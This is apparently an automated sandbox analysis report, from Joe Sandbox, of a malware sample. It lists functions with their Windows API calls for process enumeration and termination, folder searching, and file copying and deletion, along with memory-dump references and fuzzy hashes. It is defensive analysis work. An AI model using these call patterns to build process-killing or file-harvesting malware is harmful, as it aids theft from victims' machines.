                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 3729781310-0
                                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                  • Instruction ID: 1edcc1048e30bf20c5cfa763c522160cc14dd228575b89c46e6781c85c75425b
                                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                  • Instruction Fuzzy Hash: D0315AB5E40258EFDB14DFE4CC49BEEB7B9EF45300F104498E506AA184EB746A84DB52
                                                  APIs
                                                  • memset.MSVCRT ref: 004194EB
                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 396451647-0
                                                  • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                  • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B48931
                                                  • Process32First.KERNEL32(?,00000128), ref: 00B48945
                                                  • Process32Next.KERNEL32(?,00000128), ref: 00B4895A
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • CloseHandle.KERNEL32(?), ref: 00B489C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction ID: 88c64fdfb31efc729f8ecea41361147bb757aee66184a562abaee81eafd5d8f8
                                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction Fuzzy Hash: FC316DB1981218ABCB24DF94DD81FEEB7B8EB45700F1041D9F50AA21A1DB346F84DF92
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                  • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                  • lstrcatA.KERNEL32(?,00849CC8), ref: 00414FAB
                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                  • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID:
                                                  • API String ID: 3407564107-0
                                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction ID: 01bc63b1dccc1ecff36e9460ff195ac015a4be8f81a76b43c95489f29319f779
                                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction Fuzzy Hash: 661146B4D00209EFCB04EFE8D948AEDBBB9FF04305F1084A9E80666251E7306B44DB56
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B47C17
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B47C1E
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B47C2B
                                                  • wsprintfA.USER32 ref: 00B47C5A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 377395780-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 4793b83e712036f0dbf54c564d73e16ed818ef8b92e11aaa2c2ced37b72e396b
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: 271157B2944118ABCB14CFC9DD44BBEB7F9FB4DB11F10024AF601A2280D3385940CBB1
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                  • wsprintfA.USER32 ref: 004179F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 1243822799-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B47CCA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B47CD1
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B47CE4
                                                  • wsprintfA.USER32 ref: 00B47D1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 3317088062-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 399a1bba674c315765278ea0cdad9841f95b09cd99f470d495c8d48247c295d5
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 4A113CB1E85228EBEB208B54DC49FA9B7B8FB05721F1043EAE51AA3280C7745A40CB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s
                                                  • String ID:
                                                  • API String ID: 3330995566-0
                                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction ID: 96ea77230afbf952e8b5e4f34ce69b04c0e00f56549b5eac003379f1ce640c23
                                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction Fuzzy Hash: 7D11F5B4E00209EFDB14CFE6D988AAEB7F5FB08B05F14C029E025A6250D7B49601DF55
                                                  APIs
                                                  • CreateFileA.KERNEL32(00B43D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B43D55,?), ref: 00B49563
                                                  • GetFileSizeEx.KERNEL32(000000FF,00B43D55), ref: 00B49580
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B4958E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID:
                                                  • API String ID: 1378416451-0
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: d6796387b13b3b10c2332913c91ea5ed118769c895e957be57c8d065e40d9b2e
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: F9F01939E40208BBDB24DFA0DC49B9A77BAEB59710F208694AA11A7280D63597019B40
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B46D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B46D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B46D60
                                                  • Sleep.KERNEL32(00001770), ref: 00B46D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B46D81
                                                  • ExitProcess.KERNEL32 ref: 00B46D89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction ID: 850ad4335b68455cf6a399bfeec5ca6cc0a22bd1a593f4378e14724e56b98b88
                                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction Fuzzy Hash: 53F05E78E80605AFEB14ABE0DC4ABBD77F5EF06742F1015B8F512A5190CBB04700EA57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `o@
                                                  • API String ID: 0-590292170
                                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                  • lstrcatA.KERNEL32(?,00879958), ref: 00414C08
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0087B020,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: UaA
                                                  • API String ID: 2104210347-3893042857
                                                  • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                  • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimelstrcpy
                                                  • String ID: cI@$cI@
                                                  • API String ID: 62757014-1697673767
                                                  • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                  • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                  • lstrcatA.KERNEL32(?,00878F40), ref: 004150A8
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                  • String ID: aA
                                                  • API String ID: 2699682494-2567749500
                                                  • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                  • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B3A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B3A094
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3BF06
                                                    • Part of subcall function 00B49097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B490B9
                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B3BF34
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3C00C
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3C020
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID:
                                                  • API String ID: 1440504306-0
                                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction ID: 5479beff167d05aaecc05a63754b4ffa43840b11410edeca6914d502b45a44f0
                                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction Fuzzy Hash: 5AB152B1990208ABCB18FBA4DD96EED77B9AF14300F50419DF50662092EF345F48DF62
                                                  APIs
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B451E1
                                                  • lstrcat.KERNEL32(?,00421070), ref: 00B451FE
                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 00B45212
                                                  • lstrcat.KERNEL32(?,00421074), ref: 00B45224
